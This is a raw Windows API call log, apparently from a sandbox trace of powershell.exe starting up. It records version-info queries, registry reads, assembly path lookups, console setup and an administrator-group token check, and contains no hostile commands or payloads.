	[0279.987] lstrcpyW (in: lpString1=0x1557d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0279.987] CoTaskMemFree (pv=0x1557d0) 
	[0279.987] VerQueryValueW (in: pBlock=0x2b29460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x28d978, puLen=0x28d970 | out: lplpBuffer=0x28d978*=0x2b29730, puLen=0x28d970) returned 1
	[0279.987] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0279.987] CoTaskMemAlloc (cb=0x76) returned 0xf4390
	[0279.987] lstrcpyW (in: lpString1=0xf4390, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0279.987] CoTaskMemFree (pv=0xf4390) 
	[0279.987] VerQueryValueW (in: pBlock=0x2b29460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x28d978, puLen=0x28d970 | out: lplpBuffer=0x28d978*=0x2b297cc, puLen=0x28d970) returned 1
	[0279.987] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0279.987] CoTaskMemAlloc (cb=0x44) returned 0x1557d0
	[0279.987] lstrcpyW (in: lpString1=0x1557d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0279.987] CoTaskMemFree (pv=0x1557d0) 
	[0279.987] VerQueryValueW (in: pBlock=0x2b29460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x28d978, puLen=0x28d970 | out: lplpBuffer=0x28d978*=0x2b29830, puLen=0x28d970) returned 1
	[0279.987] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0279.987] CoTaskMemAlloc (cb=0x58) returned 0x116d10
	[0279.987] lstrcpyW (in: lpString1=0x116d10, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0279.987] CoTaskMemFree (pv=0x116d10) 
	[0279.987] VerQueryValueW (in: pBlock=0x2b29460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x28d978, puLen=0x28d970 | out: lplpBuffer=0x28d978*=0x2b298ac, puLen=0x28d970) returned 1
	[0279.987] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0279.987] CoTaskMemAlloc (cb=0x20) returned 0x152c70
	[0279.987] lstrcpyW (in: lpString1=0x152c70, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0279.987] CoTaskMemFree (pv=0x152c70) 
	[0279.987] VerQueryValueW (in: pBlock=0x2b29460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x28d978, puLen=0x28d970 | out: lplpBuffer=0x28d978*=0x2b29554, puLen=0x28d970) returned 1
	[0279.987] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0279.987] CoTaskMemAlloc (cb=0x66) returned 0x149af0
	[0279.987] lstrcpyW (in: lpString1=0x149af0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0279.987] CoTaskMemFree (pv=0x149af0) 
	[0279.987] VerQueryValueW (in: pBlock=0x2b29460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x28d978, puLen=0x28d970 | out: lplpBuffer=0x28d978*=0x0, puLen=0x28d970) returned 0
	[0279.988] VerQueryValueW (in: pBlock=0x2b29460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x28d978, puLen=0x28d970 | out: lplpBuffer=0x28d978*=0x0, puLen=0x28d970) returned 0
	[0279.988] VerQueryValueW (in: pBlock=0x2b29460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x28d978, puLen=0x28d970 | out: lplpBuffer=0x28d978*=0x0, puLen=0x28d970) returned 0
	[0279.988] VerQueryValueW (in: pBlock=0x2b29460, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28d948, puLen=0x28d940 | out: lplpBuffer=0x28d948*=0x2b294fc, puLen=0x28d940) returned 1
	[0279.988] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0279.988] VerLanguageNameW (in: wLang=0x0, szLang=0xf9420, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0279.988] CoTaskMemFree (pv=0xf9420) 
	[0279.988] VerQueryValueW (in: pBlock=0x2b29460, lpSubBlock="\\", lplpBuffer=0x28d998, puLen=0x28d990 | out: lplpBuffer=0x28d998*=0x2b29488, puLen=0x28d990) returned 1
	[0279.999] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0279.999] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0279.999] CoTaskMemFree (pv=0xed0a0) 
	[0280.000] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0280.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0280.000] CoTaskMemFree (pv=0xed0a0) 
	[0280.001] lstrlenW (lpString="䅁") returned 1
	[0280.004] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d868 | out: phkResult=0x28d868*=0x304) returned 0x0
	[0280.005] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d858 | out: phkResult=0x28d858*=0x308) returned 0x0
	[0280.005] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d8e8 | out: phkResult=0x28d8e8*=0x30c) returned 0x0
	[0280.650] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d82c, lpData=0x0, lpcbData=0x28d828*=0x0 | out: lpType=0x28d82c*=0x1, lpData=0x0, lpcbData=0x28d828*=0x56) returned 0x0
	[0280.651] CoTaskMemAlloc (cb=0x5a) returned 0x149a80
	[0280.651] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d7fc, lpData=0x149a80, lpcbData=0x28d7f8*=0x56 | out: lpType=0x28d7fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d7f8*=0x56) returned 0x0
	[0280.651] CoTaskMemFree (pv=0x149a80) 
	[0280.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0280.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0280.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0280.683] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0280.683] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0280.684] CoTaskMemFree (pv=0xed0a0) 
	[0283.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x28d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0283.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x28d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0285.478] CoTaskMemAlloc (cb=0x104) returned 0xed1b0
	[0285.478] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0285.478] CoTaskMemFree (pv=0xed1b0) 
	[0285.479] CoTaskMemAlloc (cb=0x104) returned 0xed1b0
	[0285.479] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0285.480] CoTaskMemFree (pv=0xed1b0) 
	[0286.272] CoTaskMemAlloc (cb=0x104) returned 0xed1b0
	[0286.272] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0286.272] CoTaskMemFree (pv=0xed1b0) 
	[0286.273] CoTaskMemAlloc (cb=0x104) returned 0xed1b0
	[0286.273] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0286.273] CoTaskMemFree (pv=0xed1b0) 
	[0286.273] CoTaskMemAlloc (cb=0x104) returned 0xed1b0
	[0286.273] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0286.273] CoTaskMemFree (pv=0xed1b0) 
	[0288.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x28d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0288.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x28d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0288.449] CoTaskMemAlloc (cb=0x104) returned 0xed1b0
	[0288.449] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.449] CoTaskMemFree (pv=0xed1b0) 
	[0288.450] CoTaskMemAlloc (cb=0x104) returned 0xed1b0
	[0288.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.450] CoTaskMemFree (pv=0xed1b0) 
	[0289.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0289.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0294.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0294.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0297.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0297.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0297.728] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0297.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0297.728] CoTaskMemFree (pv=0xed3d0) 
	[0298.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0298.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0298.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0298.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0299.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x28d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0299.345] SetErrorMode (uMode=0x1) returned 0x1
	[0299.345] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x28d7c0 | out: lpFileInformation=0x28d7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0299.345] SetErrorMode (uMode=0x1) returned 0x1
	[0301.105] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0301.105] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.105] CoTaskMemFree (pv=0xed3d0) 
	[0301.106] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0301.106] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.106] CoTaskMemFree (pv=0xed3d0) 
	[0301.106] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0301.106] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.106] CoTaskMemFree (pv=0xed3d0) 
	[0301.108] CoCreateGuid (in: pguid=0x28db88 | out: pguid=0x28db88*(Data1=0xacf39a6a, Data2=0xc1f0, Data3=0x4806, Data4=([0]=0xbe, [1]=0x65, [2]=0x9c, [3]=0x3a, [4]=0xfa, [5]=0xe, [6]=0x82, [7]=0xe1))) returned 0x0
	[0301.110] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0301.110] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.110] CoTaskMemFree (pv=0xed3d0) 
	[0301.111] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0301.111] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.111] CoTaskMemFree (pv=0xed3d0) 
	[0301.113] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0301.113] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.113] CoTaskMemFree (pv=0xed3d0) 
	[0301.117] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0301.412] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x28d830 | out: lpConsoleScreenBufferInfo=0x28d830) returned 1
	[0301.418] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0301.418] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x28d830 | out: lpConsoleScreenBufferInfo=0x28d830) returned 1
	[0301.421] GetCurrentProcess () returned 0xffffffffffffffff
	[0301.422] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x28d858 | out: TokenHandle=0x28d858*=0x1d0) returned 1
	[0301.424] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x28d778 | out: TokenInformation=0x0, ReturnLength=0x28d778) returned 0
	[0301.424] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0xb7290
	[0301.425] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x8, TokenInformation=0xb7290, TokenInformationLength=0x4, ReturnLength=0x28d778 | out: TokenInformation=0xb7290, ReturnLength=0x28d778) returned 1
	[0301.426] DuplicateTokenEx (in: hExistingToken=0x1d0, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x28d8d8 | out: phNewToken=0x28d8d8*=0x1c8) returned 1
	[0301.426] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x28d778 | out: TokenInformation=0x0, ReturnLength=0x28d778) returned 0
	[0301.426] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0xb72c0
	[0301.426] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x8, TokenInformation=0xb72c0, TokenInformationLength=0x4, ReturnLength=0x28d778 | out: TokenInformation=0xb72c0, ReturnLength=0x28d778) returned 1
	[0301.427] CheckTokenMembership (in: TokenHandle=0x1c8, SidToCheck=0x2c04208*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x28d8e8 | out: IsMember=0x28d8e8) returned 1
	[0301.427] CloseHandle (hObject=0x1c8) returned 1
	[0301.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0301.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0301.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0301.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0301.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0301.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0301.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0301.447] CoTaskMemAlloc (cb=0x804) returned 0x1b7faf00
	[0301.447] GetConsoleTitleW (in: lpConsoleTitle=0x1b7faf00, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0302.231] CoTaskMemFree (pv=0x1b7faf00) 
	[0302.253] CoTaskMemAlloc (cb=0x804) returned 0x1b7fb7b0
	[0302.253] GetConsoleTitleW (in: lpConsoleTitle=0x1b7fb7b0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0302.253] CoTaskMemFree (pv=0x1b7fb7b0) 
	[0302.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0302.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0302.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
